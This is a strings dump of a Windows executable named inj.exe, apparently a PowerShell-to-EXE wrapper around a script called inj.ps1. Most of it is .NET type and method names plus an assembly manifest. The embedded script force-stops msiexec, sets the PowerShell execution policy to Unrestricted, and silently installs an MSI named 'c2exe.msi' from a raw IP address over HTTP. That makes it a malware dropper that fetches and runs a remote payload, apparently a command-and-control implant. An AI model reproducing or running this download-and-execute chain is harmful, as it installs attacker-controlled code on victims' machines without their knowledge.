!This program cannot be run in DOS mode.
`.rsrc
@.reloc
$msiProcess = Get-Process -Name msiexec -ErrorAction SilentlyContinue
if ($msiProcess) {
# Windows Installer service is running, stop it
Stop-Process -Name msiexec -Force
Write-Host "Windows Installer service stopped."
} else {
Write-Host "Windows Installer service is not running."
Set-ExecutionPolicy Unrestricted -Scope CurrentUser -Force
msiexec /quiet /i http://3.141.55.131:8000/c2exe.msi
v4.0.30319
#Strings
<Module>
inj.exe
MainModuleRawUI
ModuleNameSpace
CHAR_INFO
SMALL_RECT
Console_Info
FileType
STDHandle
MainModuleUI
MainModule
ConsoleColorProxy
MainAppInterface
MainApp
System.Management.Automation
System.Management.Automation.Host
PSHostRawUserInterface
mscorlib
System
ValueType
Object
PSHostUserInterface
PSHost
STD_OUTPUT_HANDLE
ReadConsoleOutput
WriteConsoleOutput
ScrollConsoleScreenBuffer
GetStdHandle
ConsoleColor
get_BackgroundColor
set_BackgroundColor
get_BufferSize
set_BufferSize
Coordinates
get_CursorPosition
set_CursorPosition
get_CursorSize
set_CursorSize
FlushInputBuffer
get_ForegroundColor
set_ForegroundColor
BufferCell
Rectangle
GetBufferContents
get_KeyAvailable
get_MaxPhysicalWindowSize
get_MaxWindowSize
KeyInfo
ReadKeyOptions
ReadKey
ScrollBufferContents
SetBufferContents
get_WindowPosition
set_WindowPosition
get_WindowSize
set_WindowSize
get_WindowTitle
set_WindowTitle
BackgroundColor
BufferSize
CursorPosition
CursorSize
ForegroundColor
KeyAvailable
MaxPhysicalWindowSize
MaxWindowSize
WindowPosition
WindowSize
WindowTitle
UnicodeChar
AsciiChar
Attributes
Bottom
GetFileType
IsInputRedirected
IsOutputRedirected
IsErrorRedirected
value__
FILE_TYPE_UNKNOWN
FILE_TYPE_DISK
FILE_TYPE_CHAR
FILE_TYPE_PIPE
FILE_TYPE_REMOTE
STD_INPUT_HANDLE
STD_ERROR_HANDLE
ErrorForegroundColor
ErrorBackgroundColor
WarningForegroundColor
WarningBackgroundColor
DebugForegroundColor
DebugBackgroundColor
VerboseForegroundColor
VerboseBackgroundColor
ProgressForegroundColor
ProgressBackgroundColor
System.Collections.Generic
Dictionary`2
PSObject
System.Collections.ObjectModel
Collection`1
FieldDescription
Prompt
ChoiceDescription
PromptForChoice
PSCredential
PSCredentialTypes
PSCredentialUIOptions
PromptForCredential
get_RawUI
ReadLine
System.Security
SecureString
getPassword
ReadLineAsSecureString
WriteDebugLine
WriteErrorLine
WriteLine
WriteLineInternal
ProgressRecord
WriteProgress
WriteVerboseLine
WriteWarningLine
parent
System.Globalization
CultureInfo
originalCultureInfo
originalUICultureInfo
get_PrivateData
_consoleColorProxy
get_CurrentCulture
get_CurrentUICulture
get_InstanceId
get_Name
get_UI
Version
get_Version
EnterNestedPrompt
ExitNestedPrompt
NotifyBeginApplication
NotifyEndApplication
SetShouldExit
PrivateData
CurrentCulture
CurrentUICulture
InstanceId
get_ErrorForegroundColor
set_ErrorForegroundColor
get_ErrorBackgroundColor
set_ErrorBackgroundColor
get_WarningForegroundColor
set_WarningForegroundColor
get_WarningBackgroundColor
set_WarningBackgroundColor
get_DebugForegroundColor
set_DebugForegroundColor
get_DebugBackgroundColor
set_DebugBackgroundColor
get_VerboseForegroundColor
set_VerboseForegroundColor
get_VerboseBackgroundColor
set_VerboseBackgroundColor
get_ProgressForegroundColor
set_ProgressForegroundColor
get_ProgressBackgroundColor
set_ProgressBackgroundColor
get_ShouldExit
set_ShouldExit
get_ExitCode
set_ExitCode
ShouldExit
ExitCode
shouldExit
exitCode
UnhandledExceptionEventArgs
CurrentDomain_UnhandledException
hConsoleOutput
lpBuffer
System.Runtime.InteropServices
MarshalAsAttribute
UnmanagedType
OutAttribute
dwBufferSize
dwBufferCoord
lpReadRegion
InAttribute
lpWriteRegion
lpScrollRectangle
lpClipRectangle
dwDestinationOrigin
lpFill
nStdHandle
rectangle
options
source
destination
origin
contents
stdHandle
caption
message
descriptions
choices
defaultChoice
userName
targetName
allowedCredentialTypes
foregroundColor
backgroundColor
sourceId
record
sender
System.Reflection
AssemblyTitleAttribute
AssemblyProductAttribute
AssemblyCopyrightAttribute
AssemblyTrademarkAttribute
AssemblyDescriptionAttribute
AssemblyCompanyAttribute
System.Runtime.CompilerServices
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
DllImportAttribute
kernel32.dll
ReadConsoleOutputW
WriteConsoleOutputW
Console
get_BufferWidth
get_BufferHeight
get_Width
set_BufferWidth
get_Height
set_BufferHeight
get_CursorLeft
get_CursorTop
set_CursorTop
set_CursorLeft
ConsoleKeyInfo
get_Bottom
get_Top
get_Right
get_Left
Address
BufferCellType
get_LargestWindowWidth
get_LargestWindowHeight
ConsoleModifiers
get_Modifiers
get_CapsLock
get_NumberLock
ConsoleKey
get_Key
get_KeyChar
ControlKeyStates
get_WindowWidth
get_WindowHeight
get_Character
MoveBufferArea
GetLength
get_WindowLeft
get_WindowTop
set_WindowLeft
set_WindowTop
set_Height
set_Width
set_WindowWidth
set_WindowHeight
get_Title
set_Title
StructLayoutAttribute
LayoutKind
FieldOffsetAttribute
Kernel32.dll
String
IsNullOrEmpty
IEnumerator`1
GetEnumerator
get_Current
get_ParameterAssemblyFullName
RuntimeTypeHandle
GetTypeFromHandle
GetType
get_IsArray
GetElementType
ToString
Concat
MakeGenericType
EmptyTypes
ConstructorInfo
BindingFlags
Binder
ParameterModifier
GetConstructor
Invoke
Format
Convert
ChangeType
InvokeMember
op_Inequality
get_HelpMessage
op_Equality
get_DefaultValue
System.Collections
IEnumerator
MoveNext
IDisposable
Dispose
Exception
SortedList`2
get_Label
Substring
IndexOf
ToUpper
ToLower
ContainsKey
get_Item
get_Length
RemoveAt
AppendChar
System.IO
TextWriter
get_Error
System.Threading
Thread
get_CurrentThread
NewGuid
AsPSObject
ArgumentNullException
STAThreadAttribute
<>c__DisplayClass8
ManualResetEvent
DataAddedEventArgs
<Main>b__2
<Main>b__3
IAsyncResult
<Main>b__4
<>c__DisplayClassb
<>c__DisplayClasse
CS$<>8__locals9
PowerShell
ConsoleCancelEventArgs
<Main>b__0
CS$<>8__localsc
<Main>b__1
EventWaitHandle
set_Cancel
AsyncCallback
BeginStop
PSDataCollection`1
ErrorRecord
get_Index
get_Exception
get_Message
get_IsCompleted
AppDomain
get_CurrentDomain
UnhandledExceptionEventHandler
add_UnhandledException
System.Management.Automation.Runspaces
RunspaceFactory
Runspace
CreateRunspace
ApartmentState
set_ApartmentState
Create
ConsoleCancelEventHandler
add_CancelKeyPress
set_Runspace
PSDataStreams
get_Streams
EventHandler`1
add_DataAdded
Complete
Compare
StringComparison
StartsWith
StringSplitOptions
System.Diagnostics
Debugger
Launch
Assembly
GetExecutingAssembly
Stream
GetManifestResourceStream
System.Text
Encoding
get_UTF8
StreamReader
TextReader
ReadToEnd
WriteAllText
AddScript
System.Text.RegularExpressions
get_Success
GroupCollection
get_Groups
get_Count
Double
TryParse
AddParameter
Capture
get_Value
Boolean
AddArgument
AddCommand
PSInvocationSettings
BeginInvoke
WaitHandle
WaitOne
PSInvocationStateInfo
get_InvocationStateInfo
PSInvocationState
get_State
get_Reason
get_FriendlyName
CompilerGeneratedAttribute
inj.ps1
WrapNonExceptionThrows
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
System.Collections.Generic.List
{0}[{1}]:
ToArray
(Type !? for help.)
Wrong format, please repeat input:
[{0}] {1}
[?] Help (default is "{0}"):
{0} - {1}
User name:
Password:
<NOUSER>
DEBUG: {0}
ERROR: {0}
VERBOSE: {0}
WARNING: {0}
PSRunspace-Host
-extract
If you specify the -extract option you need to add a file for extraction in this way
-extract:"<filename>"
-debug
inj.ps1
^-([^: ]+)[ :]?([^:]*)$
$FALSE
Out-String
Stream
An exception occured:
Hit any key to exit...
Unhandled exception in
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
0.0.0.0
InternalName
inj.exe
LegalCopyright
OriginalFilename
inj.exe
ProductVersion
0.0.0.0
Assembly Version
0.0.0.0